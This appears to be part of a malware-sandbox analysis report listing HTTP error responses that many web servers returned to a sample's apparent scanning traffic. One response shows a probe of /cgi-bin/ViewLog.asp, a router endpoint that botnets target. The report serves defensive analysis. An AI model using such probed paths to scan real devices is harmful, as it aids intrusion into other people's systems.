            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sun, 23 Oct 2022 15:58:17 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Sun, 23 Oct 2022 15:58:17 GMTContent-Type: text/htmlContent-Length: 178Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 23 Oct 2022 15:58:17 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Sun, 23 Oct 2022 15:58:19 GMTContent-Length: 1282Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 3a 20 61 72 63 68 69 76 6f 20 6f 20 64 69 72 65 63 74 6f 72 69 6f 20 6e 6f 20 65 6e 63 6f 6e 74 72 61 64 6f 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 15:56:55 GMTServer: Apache/2.4.20 (Unix) OpenSSL/1.0.2h PHP/5.6.23Content-Length: 217Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 33 20 4f 63 74 20 32 30 32 32 20 31 35 3a 35 36 3a 35 35 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 32 30 20 28 55 6e 69 78 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 30 2e 32 68 20 50 48 50 2f 35 2e 36 2e 32 33 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 32 36 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</p></body></html>HTTP/1.1 400 Bad RequestDate: Sun, 23 Oct 2022 15:56:55 GMTServer: Apache/2.4.20 (Unix) OpenSSL/1.0.2h PHP/5.6.23Content-Length: 226Connection: closeContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 15:58:19 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 271Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 33 20 4f 63 74 20 32 30 32 32 20 31 35 3a 35 38 3a 31 39 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 30 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 31 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 127.0.0.1 Port 80</address></body></html>HTTP/1.1 400 Bad RequestDate: Sun, 23 Oct 2022 15:58:19 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 301Connection: closeContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 23 Oct 2022 15:58:20 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun Oct 23 21:58:20 2022Server: tr069 http serverContent-Length: 15Connection: closeContent-Type: text/plain; charset=ISO-8859-1Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: File not found
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Sun, 23 Oct 2022 15:58:21 GMTContent-Type: text/htmlContent-Length: 153Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.20.1</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: gvs 1.0Date: Sun, 23 Oct 2022 15:58:22 GMTX-Frame-Options: SAMEORIGINX-XSS-Protection: 0Content-Length: 0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Sun, 23 Oct 2022 15:58:22 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/7.5X-Powered-By: ASP.NETDate: Sun, 23 Oct 2022 15:58:22 GMTContent-Length: 5215Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 37 2e 35 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 43 42 45 31 45 46 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 34 30 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 70 61 64 64 69 6e 67 3a 34 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 20 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 23 45 44 45 44 45 44 3b 62 6f 72 64 65 72 2d 6c 65 66 74 3a 31 70 78 20 73 6f 6c 69 64 20 23 45 44 45 44 45 44 3b 62 6f 72 64 65 72 2d 72 69 67 68 74 3a 31 70 78 20 73 6f 6c 69 64
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Sun, 23 Oct 2022 15:58:25 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
